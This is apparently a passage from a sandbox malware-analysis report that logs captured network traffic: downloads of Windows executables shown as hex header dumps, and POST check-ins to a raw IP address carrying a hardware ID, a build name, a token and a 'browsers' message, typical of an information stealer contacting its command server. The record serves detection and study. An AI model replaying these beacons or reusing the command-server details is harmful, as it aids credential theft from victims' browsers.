00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 05 Jul 2024 02:36:05 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "94750-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 05 Jul 2024 02:36:05 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "6dde8-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 05 Jul 2024 02:36:06 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "1f3950-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 05 Jul 2024 02:36:08 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "3ef50-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 05 Jul 2024 02:36:08 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "13bf0-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 05 Jul 2024 02:36:12 GMTContent-Type: application/octet-streamContent-Length: 1850368Last-Modified: Fri, 05 Jul 2024 01:34:22 GMTConnection: keep-aliveETag: "66874d9e-1c3c00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cc 13 50 4a 88 72 3e 19 88 72 3e 19 88 72 3e 19 d3 1a 3d 18 86 72 3e 19 d3 1a 3b 18 28 72 3e 19 5d 1f 3a 18 9a 72 3e 19 5d 1f 3d 18 9e 72 3e 19 5d 1f 3b 18 fd 72 3e 19 d3 1a 3a 18 9c 72 3e 19 d3 1a 3f 18 9b 72 3e 19 88 72 3f 19 5e 72 3e 19 13 1c 37 18 89 72 3e 19 13 1c c1 19 89 72 3e 19 13 1c 3c 18 89 72 3e 19 52 69 63 68 88 72 3e 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 84 ea 61 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 e4 04 00 00 c6 01 00 00 00 00 00 00 60 49 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 90 49 00 00 04 00 00 ec e8 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 58 a0 06 00 6c 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 40 49 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 40 49 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 dc 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 02 00 00 00 ec 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 70 29 00 00 b0 06 00 00 02 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6f 68 6d 7a 71 6e 65 70 00 30 19 00 00 20 30 00 00 24 19 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 65 62 69 70 61 77 6f 6a 00 10 00 00 00 50 49 00 00 04 00 00 00 16 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 60 49 00 00 22 00 00 00 1a 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIIDGCGCBFBAKFHIJDBAHost: 85.28.47.30Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 49 49 44 47 43 47 43 42 46 42 41 4b 46 48 49 4a 44 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 36 39 31 37 45 39 36 37 44 32 31 33 38 35 39 31 33 37 30 34 39 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 44 47 43 47 43 42 46 42 41 4b 46 48 49 4a 44 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 4e 69 63 65 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 44 47 43 47 43 42 46 42 41 4b 46 48 49 4a 44 42 41 2d 2d 0d 0a Data Ascii: ------HIIDGCGCBFBAKFHIJDBAContent-Disposition: form-data; name="hwid"66917E967D213859137049------HIIDGCGCBFBAKFHIJDBAContent-Disposition: form-data; name="build"Nice------HIIDGCGCBFBAKFHIJDBA--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBFHDHJKKJDHJJJJKEGHHost: 85.28.47.30Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 42 46 48 44 48 4a 4b 4b 4a 44 48 4a 4a 4a 4a 4b 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 30 39 61 66 34 33 33 66 30 63 36 34 64 35 62 66 30 65 63 32 33 31 62 35 63 62 37 35 33 31 39 36 31 33 34 32 38 63 32 34 63 35 31 34 37 62 32 63 62 39 65 32 35 64 35 65 61 37 30 32 30 33 31 65 63 32 62 61 66 62 36 0d 0a 2d 2d 2d 2d 2d 2d 44 42 46 48 44 48 4a 4b 4b 4a 44 48 4a 4a 4a 4a 4b 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 44 42 46 48 44 48 4a 4b 4b 4a 44 48 4a 4a 4a 4a 4b 45 47 48 2d 2d 0d 0a Data Ascii: ------DBFHDHJKKJDHJJJJKEGHContent-Disposition: form-data; name="token"c09af433f0c64d5bf0ec231b5cb75319613428c24c5147b2cb9e25d5ea702031ec2bafb6------DBFHDHJKKJDHJJJJKEGHContent-Disposition: form-data; name="message"browsers------DBFHDHJKKJDHJJJJKEGH--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJEHCGDBFCBAKECBKKEBHost: 85.28.47.30Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 45 48 43 47 44 42 46 43 42 41 4b 45 43 42 4b 4b 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 30 39 61 66 34 33 33 66 30 63 36 34 64 35 62 66 30 65 63 32 33 31 62 35 63 62 37 35 33 31 39 36 31 33 34 32 38 63 32 34 63 35 31 34 37 62 32 63 62 39 65 32 35 64 35 65 61 37 30 32 30 33 31 65 63 32 62 61 66 62 36 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 45 48 43 47 44 42 46 43 42 41 4b 45 43 42 4b 4b 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 